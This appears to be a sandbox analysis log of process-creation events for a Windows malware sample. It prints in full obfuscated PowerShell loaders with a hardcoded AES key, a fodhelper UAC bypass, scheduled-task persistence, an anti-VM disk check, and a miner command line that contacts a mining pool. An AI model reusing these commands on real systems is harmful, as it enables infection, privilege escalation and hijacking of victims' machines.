Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" " Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe" Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe" Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\paint.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Process created: C:\Windows\System32\cmd.exe /c C:\Windows\System32\fodhelper.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
